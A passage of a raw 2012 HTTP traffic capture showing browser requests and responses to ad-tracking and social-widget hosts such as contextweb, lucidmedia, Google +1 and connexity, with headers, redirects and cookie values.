Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:44 GMT
Expires: Mon, 19 Nov 2012 04:17:45 GMT
P3P: CP=&quot;NOI ADM DEV CUR&quot;
X-Handled-By: awserh11/127.0.0.1
Set-Cookie: lm_userid=3gKsi4_iNxa; Domain=.lucidmedia.com; Expires=Tue, 19-Nov-2013 04:17:45 GMT; Path=/
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=543604&amp;ev=4257839953917615974
Content-Length: 0
Connection: close
GET /bh/rtset?do=add&pid=547259&ev=CAESEKYS_yt-_5f3x4i1G1qPWZQ&google_cver=1 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=547259&amp;ev=CAESEKYS_yt-_5f3x4i1G1qPWZQ&amp;google_cver=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583.ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e.0.0.1353298664827|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-5-121
Date: Mon, 19 Nov 2012 04:17:44 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:45 GMT; Path=/ pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583.ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e.0.0.1353298664827|547259.CAESEKYS_yt-_5f3x4i1G1qPWZQ.0.0.1353298665662; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:45 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /_/apps-static/_/ss/plusone/ver=-2s34bnfkbf73/am=!So38XEcoO7WFfKjFAQ/bf=wg/r=O/rs=AItRSTPsco_MUWQCxfRu8MH39i9U8zgJlQ HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/css; charset=UTF-8
Etag: &quot;-456967259&quot;
Expires: Mon, 17 Dec 2012 01:01:41 GMT
Date: Sat, 17 Nov 2012 01:01:41 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 3138
Age: 184564
GET /_/+1/fastbutton?bsv&size=medium&hl=en-US&origin=http%3A%2F%2Ffenwaywest.com&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /bh/rtset?do=add&pid=535393&ev=50a9b2e6448a550dd77e72ed HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=535393&amp;ev=50a9b2e6448a550dd77e72ed HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583.ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e.0.0.1353298664827|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-115-50-182
Date: Mon, 19 Nov 2012 04:17:45 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:45 GMT; Path=/ pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393.50a9b2e6448a550dd77e72ed.0.0.1353298665856|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583.ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e.0.0.1353298664827|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:45 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /fonts/ext_font/fontLib.swf HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.6.39
Date: Mon, 19 Nov 2012 04:17:45 GMT
Content-Length: 77526
Last-Modified: Thu, 19 Jan 2012 19:28:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /c/cse?a=Q&B=11 HTTP/1.1

Host: connexity.net
GET /c/cse?a=Q&amp;B=11 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: text/html
Server: Connexity
Transfer-Encoding: chunked
Connection: keep-alive
Date: Mon, 19 Nov 2012 04:17:45 GMT
Cache-Control: no-store, max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Encoding: gzip
GET /_/apps-static/_/js/plusone/p1b,p1p/rt=j/ver=caRqiSlpze8.en_US./sv=1/am=!So38XEcoO7WFfKjFAQ/d=1/rs=AItRSTO-I16dRXIwwS1OhkcmKAvmKhYsgw/cb=gapi.loaded_1 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;1818069199&quot;
Expires: Sun, 16 Dec 2012 21:42:48 GMT
Date: Fri, 16 Nov 2012 21:42:48 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 21270
Age: 196497
GET /_/apps-static/_/js/gapi/googleapis_client,iframes_styles_bubble_internal/rt=j/ver=ZmauHrJi-hM.no./sv=1/am=!lVF6vhgpQzaIV3w7gg/d=1/rs=AItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ/cb=gapi.loaded_0 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-1593465469&quot;
Expires: Tue, 18 Dec 2012 19:15:42 GMT
Date: Sun, 18 Nov 2012 19:15:42 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 32450
Age: 32523
GET /swfobject.js HTTP/1.1

Host: s.cxt.ms

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
HTTP/1.0 200 OK

Content-Type: application/x-ja